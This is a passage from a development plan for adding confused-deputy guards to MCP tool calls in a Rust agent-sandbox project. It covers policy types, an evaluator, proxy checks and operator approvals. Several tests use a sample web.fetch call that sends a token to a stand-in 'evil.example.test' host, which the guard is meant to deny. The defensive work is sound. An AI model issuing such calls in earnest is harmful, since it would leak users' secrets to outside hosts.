+- `agentenv-core/src/lifecycle.rs`: parse and validate `policy.mcp.confused_deputy_guards` during blueprint verification.
+- `agentenv-core/src/egress_proxy.rs`: carry optional MCP guard config in MCP broker routes and launch config.
+- `agentenv-core/src/runtime.rs`: build guard config from blueprint policy, attach it to HTTP MCP proxy routes, rewrite stdio endpoints, and copy stdio guard config into the sandbox.
+- `agentenv/src/proxy_cli.rs`: evaluate guarded MCP HTTP requests before credential resolution and forwarding.
+- `agentenv/src/mcp_guard_cli.rs`: hidden stdio wrapper command that relays framed JSON-RPC while applying the same evaluator.
+- Docs and blueprints: document the config shape and add commented examples.
+
+---
+
+## Task 1: Add Serializable MCP Guard Policy Types
+
+**Files:**
+- Modify: `crates/agentenv-proto/Cargo.toml`
+- Modify: `crates/agentenv-proto/src/types.rs`
+- Modify: `crates/agentenv-proto/build.rs`
+
+- [ ] **Step 1: Write failing proto policy parsing tests**
+
+Add tests to `crates/agentenv-proto/src/types.rs` near the existing serde tests:
+
+```rust
+#[test]
+fn mcp_guard_config_parses_full_yaml() {
+    let yaml = r#"
+enabled: true
+default_approval: per-call
+tool_policies:
+  "filesystem.read":
+    approval: never
+    rate_limit: 50/session
+  "web.fetch":
+    approval: per-call
+    url_allowlist: ["api.github.com", "crates.io"]
+    redact_args: true
+  "*.write":
+    approval: per-session
+cross_tool_flows:
+  forbid_read_to_write_turns: 5
+"#;
+
+    let config: McpGuardConfig = serde_yaml::from_str(yaml).expect("config parses");
+
+    assert!(config.enabled);
+    assert_eq!(config.default_approval, McpApprovalMode::PerCall);
+    assert_eq!(
+        config.tool_policies["filesystem.read"].approval,
+        Some(McpApprovalMode::Never)
+    );
+    assert_eq!(
+        config.tool_policies["filesystem.read"].rate_limit,
+        Some(McpSessionRateLimit { calls: 50 })
+    );
+    assert_eq!(
+        config.tool_policies["web.fetch"].url_allowlist,
+        vec!["api.github.com".to_owned(), "crates.io".to_owned()]
+    );
+    assert_eq!(
+        config.cross_tool_flows.forbid_read_to_write_turns,
+        Some(5)
+    );
+}
+
+#[test]
+fn mcp_guard_config_rejects_unknown_fields() {
+    let yaml = r#"
+enabled: true
+surprise: true
+"#;
+
+    let error = serde_yaml::from_str::<McpGuardConfig>(yaml)
+        .expect_err("unknown fields must fail closed");
+
+    assert!(error.to_string().contains("surprise"));
+}
+```
+
+- [ ] **Step 2: Run tests and verify they fail**
+
+Run:
+
+```bash
+cargo test -p agentenv-proto mcp_guard_config_parses_full_yaml mcp_guard_config_rejects_unknown_fields
+```
+
+Expected: compile fails because the MCP guard config types do not exist.
+
+- [ ] **Step 3: Implement proto config types**
+
+Update `crates/agentenv-proto/Cargo.toml`:
+
+```toml
+[dev-dependencies]
+serde_yaml.workspace = true
+```
+
+Add to `crates/agentenv-proto/src/types.rs`:
+
+```rust
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(rename_all = "kebab-case")]
+pub enum McpApprovalMode {
+    Never,
+    PerCall,
+    PerSession,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(deny_unknown_fields)]
+pub struct McpGuardConfig {
+    #[serde(default)]
+    pub enabled: bool,
+    #[serde(default = "default_mcp_approval")]
+    pub default_approval: McpApprovalMode,
+    #[serde(default)]
+    pub tool_policies: BTreeMap<String, McpToolPolicy>,
+    #[serde(default)]
+    pub cross_tool_flows: McpCrossToolFlowPolicy,
+}
+
+#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(deny_unknown_fields)]
+pub struct McpToolPolicy {
+    #[serde(default)]
+    pub approval: Option<McpApprovalMode>,
+    #[serde(default, deserialize_with = "deserialize_mcp_rate_limit")]
+    pub rate_limit: Option<McpSessionRateLimit>,
+    #[serde(default)]
+    pub url_allowlist: Vec<String>,
+    #[serde(default)]
+    pub redact_args: bool,
+}
+
+#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(deny_unknown_fields)]
+pub struct McpCrossToolFlowPolicy {
+    #[serde(default)]
+    pub forbid_read_to_write_turns: Option<usize>,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+pub struct McpSessionRateLimit {
+    pub calls: u32,
+}
+
+fn default_mcp_approval() -> McpApprovalMode {
+    McpApprovalMode::Never
+}
+```
+
+Implement `deserialize_mcp_rate_limit` so `50/session` becomes
+`McpSessionRateLimit { calls: 50 }` and malformed values produce a serde error.
+
+Update `crates/agentenv-proto/build.rs`:
+
+```rust
+write_schema::<types::McpGuardConfig>(&schema_dir, "mcp-guard-config");
+```
+
+- [ ] **Step 4: Run focused proto tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-proto mcp_guard_config_
+```
+
+Expected: both proto config tests pass.
+
+---
+
+## Task 2: Add MCP Guard Evaluator
+
+**Files:**
+- Modify: `crates/agentenv-mcp/Cargo.toml`
+- Modify: `crates/agentenv-mcp/src/lib.rs`
+- Create: `crates/agentenv-mcp/src/guard.rs`
+
+- [ ] **Step 1: Write failing evaluator tests**
+
+Create `crates/agentenv-mcp/src/guard.rs` with tests first:
+
+```rust
+#[cfg(test)]
+mod tests {
+    use std::collections::BTreeMap;
+
+    use agentenv_proto::{
+        McpApprovalMode, McpCrossToolFlowPolicy, McpGuardConfig, McpSessionRateLimit,
+        McpToolPolicy,
+    };
+    use serde_json::json;
+
+    use super::*;
+
+    #[test]
+    fn exact_policy_beats_wildcard_policy() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::PerCall,
+            tool_policies: [
+                ("*.write".to_owned(), McpToolPolicy {
+                    approval: Some(McpApprovalMode::PerSession),
+                    ..McpToolPolicy::default()
+                }),
+                ("filesystem.write".to_owned(), McpToolPolicy {
+                    approval: Some(McpApprovalMode::Never),
+                    ..McpToolPolicy::default()
+                }),
+            ].into_iter().collect(),
+            cross_tool_flows: McpCrossToolFlowPolicy::default(),
+        };
+
+        let matched = match_policy(&config, "filesystem.write");
+
+        assert_eq!(matched.pattern.as_deref(), Some("filesystem.write"));
+        assert_eq!(matched.approval, McpApprovalMode::Never);
+    }
+
+    #[test]
+    fn evaluator_flags_url_allowlist_violation_in_nested_args() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::Never,
+            tool_policies: [("web.fetch".to_owned(), McpToolPolicy {
+                url_allowlist: vec!["api.github.com".to_owned()],
+                ..McpToolPolicy::default()
+            })].into_iter().collect(),
+            cross_tool_flows: McpCrossToolFlowPolicy::default(),
+        };
+        let mut state = GuardSessionState::default();
+        let request = json!({
+            "jsonrpc": "2.0",
+            "id": 1,
+            "method": "tools/call",
+            "params": {
+                "name": "web.fetch",
+                "arguments": {"url": "https://evil.example.test/?token=secret"}
+            }
+        });
+
+        let decision = evaluate_json_rpc_request(&config, &mut state, &request)
+            .expect("request evaluation succeeds");
+
+        assert_eq!(decision.action, GuardAction::Deny);
+        assert_eq!(decision.reason, GuardReason::UrlAllowlistViolation);
+        assert!(!decision.redacted_event_context.to_string().contains("secret"));
+    }
+
+    #[test]
+    fn session_rate_limit_denies_after_limit() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::Never,
+            tool_policies: [("filesystem.read".to_owned(), McpToolPolicy {
+                rate_limit: Some(McpSessionRateLimit { calls: 1 }),
+                ..McpToolPolicy::default()
+            })].into_iter().collect(),
+            cross_tool_flows: McpCrossToolFlowPolicy::default(),
+        };
+        let mut state = GuardSessionState::default();
+        let request = json!({
+            "jsonrpc": "2.0",
+            "id": 1,
+            "method": "tools/call",
+            "params": {"name": "filesystem.read", "arguments": {"path": "/tmp/a"}}
+        });
+
+        assert_eq!(evaluate_json_rpc_request(&config, &mut state, &request).unwrap().action, GuardAction::Forward);
+        let second = evaluate_json_rpc_request(&config, &mut state, &request).unwrap();
+        assert_eq!(second.action, GuardAction::Deny);
+        assert_eq!(second.reason, GuardReason::RateLimited);
+    }
+}
+```
+
+- [ ] **Step 2: Run tests and verify they fail**
+
+Run:
+
+```bash
+cargo test -p agentenv-mcp exact_policy_beats_wildcard_policy evaluator_flags_url_allowlist_violation_in_nested_args session_rate_limit_denies_after_limit
+```
+
+Expected: compile fails because the guard evaluator types and dependencies are missing.
+
+- [ ] **Step 3: Add dependencies and module export**
+
+Update `crates/agentenv-mcp/Cargo.toml`:
+
+```toml
+serde.workspace = true
+serde_json.workspace = true
+serde_yaml.workspace = true
+thiserror.workspace = true
+```
+
+Keep the existing `agentenv-core` dependency unchanged for current SSRF endpoint validation. Do not add an `agentenv-core -> agentenv-mcp` dependency in later tasks; shared config types live in `agentenv-proto`.
+
+Update `crates/agentenv-mcp/src/lib.rs`:
+
+```rust
+pub mod guard;
+```
+
+- [ ] **Step 4: Implement the pure evaluator**
+
+Implement `crates/agentenv-mcp/src/guard.rs` with:
+
+```rust
+use std::collections::{BTreeMap, VecDeque};
+
+use agentenv_proto::{McpApprovalMode, McpGuardConfig, McpSessionRateLimit};
+use serde_json::Value;
+use thiserror::Error;
+use url::Url;
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct MatchedToolPolicy {
+    pub pattern: Option<String>,
+    pub approval: McpApprovalMode,
+    pub rate_limit: Option<McpSessionRateLimit>,
+    pub url_allowlist: Vec<String>,
+    pub redact_args: bool,
+}
+
+#[derive(Debug, Default)]
+pub struct GuardSessionState {
+    calls_by_pattern: BTreeMap<String, u32>,
+    recent_reads: VecDeque<RecentRead>,
+    session_grants: BTreeMap<String, bool>,
+}
+
+#[derive(Debug, Clone, PartialEq)]
+pub struct GuardDecision {
+    pub action: GuardAction,
+    pub reason: GuardReason,
+    pub tool_name: Option<String>,
+    pub matched_policy: Option<String>,
+    pub approval_mode: McpApprovalMode,
+    pub redacted_event_context: Value,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum GuardAction {
+    Forward,
+    Deny,
+    RequestApproval,
+    NotToolCall,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum GuardReason {
+    Disabled,
+    NotToolCall,
+    AllowedByPolicy,
+    ApprovalRequired,
+    UrlAllowlistViolation,
+    CredentialLikeArgument,
+    EnvVarLikeArgument,
+    RateLimited,
+    CrossToolFlow,
+    MalformedToolCall,
+}
+
+#[derive(Debug, Error)]
+pub enum GuardError {
+    #[error("malformed MCP tool call: {0}")]
+    MalformedToolCall(String),
+}
+```
+
+Then implement:
+
+- `pub fn match_policy(config: &McpGuardConfig, tool_name: &str) -> MatchedToolPolicy`
+- `pub fn evaluate_json_rpc_request(config, state, request)`
+- recursive argument summarization and redaction helpers
+- URL host extraction and allowlist matching
+- credential-key and env-var-looking value detection
+- conservative read/write/external classification helpers
+- session rate counters and read-to-write flow window
+
+Keep this module pure. It must not import `agentenv-approvals` or
+`agentenv-events`.
+
+- [ ] **Step 5: Run focused evaluator tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-mcp exact_policy_beats_wildcard_policy evaluator_flags_url_allowlist_violation_in_nested_args session_rate_limit_denies_after_limit
+```
+
+Expected: all new evaluator tests pass.
+
+---
+
+## Task 3: Validate Blueprint MCP Guard Config
+
+**Files:**
+- Modify: `crates/agentenv-core/src/lifecycle.rs`
+- Test: `crates/agentenv-core/tests/roundtrip.rs`
+
+- [ ] **Step 1: Write failing lifecycle tests**
+
+Append tests to `crates/agentenv-core/tests/roundtrip.rs`:
+
+```rust
+#[test]
+fn verify_blueprint_accepts_mcp_guard_policy_extra() {
+    let yaml = r#"
+version: 0.1.0
+min_agentenv_version: 0.0.1-alpha0
+sandbox:
+  driver: openshell
+agent:
+  driver: codex
+context:
+  driver: none
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: per-call
+      tool_policies:
+        "*.write":
+          approval: per-session
+"#;
+
+    let resolved = agentenv_core::lifecycle::verify_blueprint_yaml(yaml)
+        .expect("MCP guard config should verify");
+
+    assert_eq!(resolved.blueprint.policy.tier, "restricted");
+}
+
+#[test]
+fn verify_blueprint_rejects_invalid_mcp_guard_policy_extra() {
+    let yaml = r#"
+version: 0.1.0
+min_agentenv_version: 0.0.1-alpha0
+sandbox:
+  driver: openshell
+agent:
+  driver: codex
+context:
+  driver: none
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: always
+"#;
+
+    let err = agentenv_core::lifecycle::verify_blueprint_yaml(yaml)
+        .expect_err("invalid MCP guard config should fail");
+
+    assert!(err.to_string().contains("policy.mcp.confused_deputy_guards"));
+}
+```
+
+- [ ] **Step 2: Run tests and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv-core verify_blueprint_accepts_mcp_guard_policy_extra verify_blueprint_rejects_invalid_mcp_guard_policy_extra
+```
+
+Expected: invalid config is not rejected yet.
+
+- [ ] **Step 3: Add lifecycle validation using proto config types**
+
+Add to `verify_resolved_blueprint` in `crates/agentenv-core/src/lifecycle.rs`:
+
+```rust
+validate_mcp_guard_policy_extra(&resolved.blueprint)?;
+```
+
+Add helper:
+
+```rust
+fn validate_mcp_guard_policy_extra(blueprint: &Blueprint) -> Result<(), LifecycleError> {
+    let Some(mcp) = blueprint.policy.extra.get("mcp") else {
+        return Ok(());
+    };
+    let Some(guards) = mcp
+        .get("confused_deputy_guards")
+        .cloned()
+    else {
+        return Ok(());
+    };
+    serde_yaml::from_value::<agentenv_proto::McpGuardConfig>(guards).map_err(|source| {
+        LifecycleError::InvalidMcpGuardPolicy {
+            path: "policy.mcp.confused_deputy_guards",
+            message: source.to_string(),
+        }
+    })?;
+    Ok(())
+}
+```
+
+Add `LifecycleError::InvalidMcpGuardPolicy { path: &'static str, message: String }`.
+
+- [ ] **Step 4: Run focused tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-core verify_blueprint_accepts_mcp_guard_policy_extra verify_blueprint_rejects_invalid_mcp_guard_policy_extra
+```
+
+Expected: both tests pass.
+
+---
+
+## Task 4: Carry MCP Guard Config Through Egress Proxy Planning
+
+**Files:**
+- Modify: `crates/agentenv-core/src/egress_proxy.rs`
+- Modify: `crates/agentenv/src/proxy_cli.rs`
+
+- [ ] **Step 1: Write failing egress proxy plan test**
+
+Add to `crates/agentenv-core/src/egress_proxy.rs` tests:
+
+```rust
+#[test]
+fn mcp_route_carries_guard_config_when_supplied() {
+    let endpoint = McpProxySource {
+        route_id: "primary".to_owned(),
+        upstream_url: "https://mcp.example.test/rpc".parse().unwrap(),
+        token_credential_name: Some("MCP_TOKEN".to_owned()),
+        guard_config: Some(agentenv_proto::McpGuardConfig {
+            enabled: true,
+            default_approval: agentenv_proto::McpApprovalMode::PerCall,
+            tool_policies: BTreeMap::new(),
+            cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+        }),
+    };
+
+    let plan = build_egress_proxy_plan(EgressProxyPlanInput {
+        env_name: "demo".to_owned(),
+        proxy_base_url: "http://127.0.0.1:31002".parse().unwrap(),
+        credential_requirements: vec![required("MCP_TOKEN")],
+        network_policy: policy(),
+        context_mcp: Some(endpoint),
+        inference_endpoint: None,
+        explicit_routes: ExplicitEgressRoutes::default(),
+    }).expect("plan builds");
+
+    let route = plan.routes.iter().find(|route| route.id == "mcp.primary").unwrap();
+    assert!(route.mcp_guard.as_ref().is_some_and(|guard| guard.enabled));
+}
+```
+
+- [ ] **Step 2: Run test and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv-core mcp_route_carries_guard_config_when_supplied
+```
+
+Expected: compile fails because `guard_config` and `mcp_guard` fields do not exist.
+
+- [ ] **Step 3: Add serializable guard fields**
+
+Update `McpProxySource`:
+
+```rust
+pub struct McpProxySource {
+    pub route_id: String,
+    pub upstream_url: Url,
+    pub token_credential_name: Option<String>,
+    pub guard_config: Option<agentenv_proto::McpGuardConfig>,
+}
+```
+
+Update `BrokerRoute`:
+
+```rust
+#[serde(default, skip_serializing_if = "Option::is_none")]
+pub mcp_guard: Option<agentenv_proto::McpGuardConfig>,
+```
+
+When building the MCP route, set `mcp_guard: source.guard_config`.
+
+Update all existing route constructors in tests to set `mcp_guard: None`.
+
+- [ ] **Step 4: Run focused tests**
+
+Run:
+
+```bash
+cargo test -p agentenv-core egress_proxy::tests::mcp_route_carries_guard_config_when_supplied
+cargo test -p agentenv proxy_cli::tests::mcp_route_injects_bearer_token
+```
+
+Expected: tests pass after route initializers are updated.
+
+---
+
+## Task 5: Guard HTTP MCP Requests In The Proxy
+
+**Files:**
+- Modify: `crates/agentenv/src/proxy_cli.rs`
+- Modify: `crates/agentenv/Cargo.toml`
+
+- [ ] **Step 1: Write failing HTTP guard tests**
+
+Add to `crates/agentenv/src/proxy_cli.rs` tests:
+
+```rust
+#[tokio::test]
+async fn mcp_guard_denies_url_allowlist_violation_before_credential_resolution() {
+    let root = temp_dir("agentenv-proxy-mcp-guard-deny");
+    fs::create_dir_all(&root).expect("temp dir should be created");
+    let mut route = test_mcp_route();
+    route.mcp_guard = Some(agentenv_proto::McpGuardConfig {
+        enabled: true,
+        default_approval: agentenv_proto::McpApprovalMode::Never,
+        tool_policies: [("web.fetch".to_owned(), agentenv_proto::McpToolPolicy {
+            url_allowlist: vec!["api.github.com".to_owned()],
+            ..agentenv_proto::McpToolPolicy::default()
+        })].into_iter().collect(),
+        cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+    });
+    let policy = policy_with_rules(&["mcp.example.test"], &[]);
+    let state = Arc::new(test_state(&root, route, policy.clone(), BTreeMap::new()));
+    fs::write(
+        &state.config.policy_path,
+        serde_json::to_vec(&policy).expect("policy should serialize"),
+    ).expect("policy should be written");
+    let request = Request::builder()
+        .method("POST")
+        .uri("/v1/mcp/primary")
+        .header("content-type", "application/json")
+        .body(Body::from(serde_json::to_vec(&serde_json::json!({
+            "jsonrpc": "2.0",
+            "id": 1,
+            "method": "tools/call",
+            "params": {
+                "name": "web.fetch",
+                "arguments": {"url": "https://evil.example.test/?token=secret"}
+            }
+        })).unwrap()))
+        .expect("request should build");
+
+    let response = handle_proxy_request(Arc::clone(&state), request)
+        .await
+        .expect("guard denial should be handled");
+
+    assert_eq!(response.status(), StatusCode::FORBIDDEN);
+}
+```
+
+- [ ] **Step 2: Run test and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv mcp_guard_denies_url_allowlist_violation_before_credential_resolution
+```
+
+Expected: request is forwarded or credential resolution fails instead of a guard denial.
+
+- [ ] **Step 3: Add proxy guard evaluation before credential resolution**
+
+Update `crates/agentenv/Cargo.toml`:
+
+```toml
+agentenv-mcp = { path = "../agentenv-mcp" }
+```
+
+Add a `mcp_guard_states: Arc<Mutex<BTreeMap<String, agentenv_mcp::guard::GuardSessionState>>>`
+field to `ProxyState` and initialize it in `run_proxy` and `test_state`.
+
+In `handle_proxy_request`, after policy allow/rate-limit checks and before credential resolution:
+
+```rust
+let (guard_response, request) = maybe_handle_mcp_guard(&state, &route, request).await?;
+if let Some(response) = guard_response {
+    return Ok(response);
+}
+```
+
+Implement `maybe_handle_mcp_guard` to:
+
+- return `(None, request)` when `route.mcp_guard` is absent or disabled
+- only inspect `POST` requests with JSON bodies on `BrokerService::Mcp`
+- buffer the body into bytes, evaluate the JSON-RPC request, and return the reconstructed request body for forwarding when allowed
+- emit a redacted `mcp_tool_call` event for every evaluated tool call
+- return `403` for `GuardAction::Deny`
+- return `403` for `GuardAction::RequestApproval` initially, then Task 6 replaces this with approval waiting
+
+- [ ] **Step 4: Run focused tests**
+
+Run:
+
+```bash
+cargo test -p agentenv mcp_guard_denies_url_allowlist_violation_before_credential_resolution
+cargo test -p agentenv proxy_cli::tests::mcp_route_injects_bearer_token
+```
+
+Expected: guard denial test and existing MCP route test pass.
+
+---
+
+## Task 6: Route MCP Guard Approval Requests Through Approvals
+
+**Files:**
+- Modify: `crates/agentenv/src/proxy_cli.rs`
+
+- [ ] **Step 1: Write failing approval test**
+
+Add a proxy test that builds a guard config with `default_approval: per-call`,
+creates an env-scoped approval coordinator, records an operator denial in the
+same store, and asserts the guarded request blocks until that denial is visible:
+
+```rust
+#[tokio::test]
+async fn mcp_guard_per_call_policy_waits_for_operator_denial() {
+    let root = temp_dir("agentenv-proxy-mcp-guard-approval");
+    fs::create_dir_all(&root).expect("temp dir should be created");
+    let mut route = test_mcp_route();
+    route.mcp_guard = Some(agentenv_proto::McpGuardConfig {
+        enabled: true,
+        default_approval: agentenv_proto::McpApprovalMode::PerCall,
+        tool_policies: BTreeMap::new(),
+        cross_tool_flows: agentenv_proto::McpCrossToolFlowPolicy::default(),
+    });
+    let policy = policy_with_rules(&["mcp.example.test"], &[]);
+    let approval_db = root.join("events.db");
+    let coordinator = agentenv_approvals::ApprovalCoordinator::new(
+        agentenv_approvals::ApprovalCoordinatorConfig {
+            store: agentenv_approvals::ApprovalStore::open(&approval_db).unwrap(),
+            events: Arc::new(agentenv_events::NoopEventEmitter),
+            poll_interval: std::time::Duration::from_millis(10),
+            overlay_path: None,
+            proposal_path: None,
+            notifications: None,
+        },
+    );
+    let state = Arc::new(test_state_with_approvals(
+        &root,
+        route,
+        policy.clone(),
+        BTreeMap::new(),
+        Some(coordinator),
+    ));
+    fs::write(&state.config.policy_path, serde_json::to_vec(&policy).unwrap()).unwrap();
+    let approval_db_for_decider = approval_db.clone();
+    let decider = tokio::spawn(async move {
+        let store = agentenv_approvals::ApprovalStore::open(&approval_db_for_decider).unwrap();
+        loop {
+            let pending = store
+                .list_requests(agentenv_approvals::ApprovalRequestFilter {
+                    env: Some("demo".to_owned()),
+                    status: Some(agentenv_approvals::ApprovalStatus::Pending),
+                })
+                .unwrap();
+            if let Some(request) = pending.first() {
+                store
+                    .record_decision(&agentenv_approvals::ApprovalDecisionRecord {
+                        request_id: request.id.clone(),
+                        decision: agentenv_approvals::ApprovalDecisionValue::Deny,
+                        scope: agentenv_approvals::ApprovalScope::Once,
+                        decided_by: "agentenv:test".to_owned(),
+                        decided_at: time::OffsetDateTime::now_utc(),
+                        reason: Some("test_denial".to_owned()),
+                        context: serde_json::json!({"source": "test"}),
+                        trace_id: request.created_trace_id.clone(),
+                    })
+                    .unwrap();
+                break;
+            }
+            tokio::time::sleep(std::time::Duration::from_millis(10)).await;
+        }
+    });
+    let request = Request::builder()
+        .method("POST")
+        .uri("/v1/mcp/primary")
+        .header("content-type", "application/json")
+        .body(Body::from(r#"{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"filesystem.write","arguments":{"path":"/tmp/a"}}}"#))
+        .unwrap();
+
+    let response = handle_proxy_request(Arc::clone(&state), request).await.unwrap();
+    decider.await.unwrap();
+
+    assert_eq!(response.status(), StatusCode::FORBIDDEN);
+}
+```
+
+- [ ] **Step 2: Run test and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv mcp_guard_per_call_policy_waits_for_operator_denial
+```
+
+Expected: currently returns forbidden immediately without creating or waiting on
+an approval request.
+
+- [ ] **Step 3: Add approval coordinator to proxy state**
+
+Extend `ProxyState` with:
+
+```rust
+approval_coordinator: Option<agentenv_approvals::ApprovalCoordinator>,
+```
+
+Build it in `run_proxy` using the existing env root from `runtime_root_from_events_db`, the same events emitter, and env-scoped overlay/proposal paths.
+
+For `GuardAction::RequestApproval`, create `ApprovalRequest::new`:
+
+```rust
+let request = ApprovalRequest::new(
+    format!("req_{}", uuid::Uuid::new_v7()),
+    state.env_name.clone(),
+    ApprovalKind::McpTool,
+    tool_name,
+    reason_code,
+    context,
+    time::OffsetDateTime::now_utc(),
+    default_scope,
+    Duration::from_secs(60),
+    crate::new_cli_trace_id(),
+);
+```
+
+Submit the request and wait for `wait_for_decision`. Return:
+
+- forwarded request when the approval decision is allow
+- `403 Forbidden` when denied or expired
+
+If `approval_coordinator` is `None`, fail closed with `503 Service Unavailable`
+and reason `approval_unavailable`. Do not return a pending response for an
+approval-required tool call; issue #42 requires blocking until the approval
+request is resolved or auto-denied.
+
+- [ ] **Step 4: Run focused tests**
+
+Run:
+
+```bash
+cargo test -p agentenv mcp_guard_per_call_policy_waits_for_operator_denial
+cargo test -p agentenv proxy_cli::tests::policy_reload_blocks_route_after_file_update
+```
+
+Expected: tests pass.
+
+---
+
+## Task 7: Add Stdio MCP Guard CLI Wrapper
+
+**Files:**
+- Modify: `crates/agentenv/src/main.rs`
+- Create: `crates/agentenv/src/mcp_guard_cli.rs`
+- Modify: `crates/agentenv/Cargo.toml`
+
+- [ ] **Step 1: Write failing CLI parse test**
+
+Add to existing CLI parse tests in `crates/agentenv/src/main.rs`:
+
+```rust
+#[test]
+fn mcp_guard_command_parses() {
+    let cli = Cli::try_parse_from([
+        "agentenv",
+        "mcp-guard",
+        "run",
+        "--env",
+        "demo",
+        "--config",
+        "/tmp/mcp-guard.json",
+        "--events-db",
+        "/tmp/events.db",
+        "--stdio-upstream",
+        "agentenv-fs-mcp --root /tmp",
+    ])
+    .expect("mcp guard command parses");
+
+    match cli.command {
+        Some(Commands::McpGuard(McpGuardArgs {
+            command: McpGuardCommand::Run(args),
+        })) => {
+            assert_eq!(args.env, "demo");
+            assert_eq!(args.config, PathBuf::from("/tmp/mcp-guard.json"));
+            assert_eq!(args.events_db, PathBuf::from("/tmp/events.db"));
+            assert_eq!(args.stdio_upstream, "agentenv-fs-mcp --root /tmp");
+        }
+        other => panic!("unexpected command: {other:?}"),
+    }
+}
+```
+
+- [ ] **Step 2: Run test and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv mcp_guard_command_parses
+```
+
+Expected: command is unknown.
+
+- [ ] **Step 3: Add hidden command and module**
+
+Update `crates/agentenv/src/main.rs`:
+
+```rust
+mod mcp_guard_cli;
+```
+
+Add hidden command:
+
+```rust
+#[command(hide = true, name = "mcp-guard")]
+McpGuard(McpGuardArgs),
+```
+
+Add args:
+
+```rust
+#[derive(Debug, Args)]
+pub(crate) struct McpGuardArgs {
+    #[command(subcommand)]
+    command: McpGuardCommand,
+}
+
+#[derive(Debug, Subcommand)]
+pub(crate) enum McpGuardCommand {
+    Run(McpGuardRunArgs),
+}
+
+#[derive(Debug, Args, Clone)]
+pub(crate) struct McpGuardRunArgs {
+    #[arg(long)]
+    env: String,
+    #[arg(long)]
+    config: PathBuf,
+    #[arg(long = "events-db")]
+    events_db: PathBuf,
+    #[arg(long = "stdio-upstream")]
+    stdio_upstream: String,
+}
+```
+
+Dispatch:
+
+```rust
+Some(Commands::McpGuard(args)) => mcp_guard_cli::run(args).await,
+```
+
+- [ ] **Step 4: Implement stdio wrapper in small tested units**
+
+Create `crates/agentenv/src/mcp_guard_cli.rs` with:
+
+- `run(args) -> Result<()>`
+- `read_lsp_message<R: BufRead>(reader) -> Result<Option<Vec<u8>>>`
+- `write_lsp_message<W: Write>(writer, body: &[u8]) -> Result<()>`
+- `evaluate_client_message(config, state, body) -> GuardDecision`
+- `json_rpc_error_response(id, code, message) -> Vec<u8>`
+
+Initial implementation should support one request/response relay loop using blocking stdio in `tokio::task::spawn_blocking`. Use `std::process::Command` for the child process and pipe stdin/stdout.
+
+- [ ] **Step 5: Add frame unit tests**
+
+Add tests in `mcp_guard_cli.rs`:
+
+```rust
+#[test]
+fn lsp_message_round_trips_body() {
+    let body = br#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#;
+    let mut out = Vec::new();
+    write_lsp_message(&mut out, body).unwrap();
+
+    let decoded = read_lsp_message(&mut std::io::BufReader::new(out.as_slice()))
+        .unwrap()
+        .unwrap();
+
+    assert_eq!(decoded, body);
+}
+```
+
+Run:
+
+```bash
+cargo test -p agentenv lsp_message_round_trips_body mcp_guard_command_parses
+```
+
+Expected: tests pass.
+
+---
+
+## Task 8: Rewrite Runtime MCP Endpoints
+
+**Files:**
+- Modify: `crates/agentenv-core/src/runtime.rs`
+- Modify: `crates/agentenv-core/src/egress_proxy.rs`
+
+- [ ] **Step 1: Write failing runtime tests**
+
+Add tests near existing MCP endpoint rewrite tests in `crates/agentenv-core/src/runtime.rs`:
+
+```rust
+#[tokio::test]
+async fn create_env_rewrites_stdio_mcp_endpoint_when_guard_enabled() {
+    let root = unique_root("agentenv-mcp-guard-stdio");
+    let options = RuntimeOptions {
+        root,
+        log_level: LogLevel::Info,
+        non_interactive: true,
+    };
+    let yaml = r#"
+version: 0.1.0
+min_agentenv_version: 0.0.1-alpha0
+sandbox:
+  driver: openshell
+agent:
+  driver: codex
+context:
+  driver: filesystem
+  mount: .
+policy:
+  tier: restricted
+  mcp:
+    confused_deputy_guards:
+      enabled: true
+      default_approval: per-call
+"#;
+    let tracker = Arc::new(AgentSetupTracker::default());
+    let factory = AgentSetupFactory {
+        tracker: Arc::clone(&tracker),
+    };
+    let mut credentials = super::tests_support::EmptyCredentialProvider;
+
+    super::create_env(&options, &factory, &mut credentials, "demo", yaml)
+        .await
+        .expect("env create should succeed");
+
+    let endpoint_batches = tracker
+        .mcp_config_endpoints
+        .lock()
+        .expect("mcp config endpoint tracker");
+    assert!(endpoint_batches[0][0].url.contains("agentenv mcp-guard run"));
+    assert_eq!(endpoint_batches[0][0].transport, agentenv_proto::McpTransport::Stdio);
+}
+```
+
+- [ ] **Step 2: Run test and verify failure**
+
+Run:
+
+```bash
+cargo test -p agentenv-core create_env_rewrites_stdio_mcp_endpoint_when_guard_enabled
+```
+
+Expected: stdio endpoint remains `agentenv-fs-mcp`.
+
+- [ ] **Step 3: Add runtime guard config extraction**
+
+Add helper in `runtime.rs`:
+
+```rust
+fn mcp_guard_config_from_policy_extra(
+    policy_extra: &BTreeMap<String, serde_yaml::Value>,
+) -> RuntimeResult<Option<agentenv_proto::McpGuardConfig>> {
+    let Some(mcp) = policy_extra.get("mcp") else {
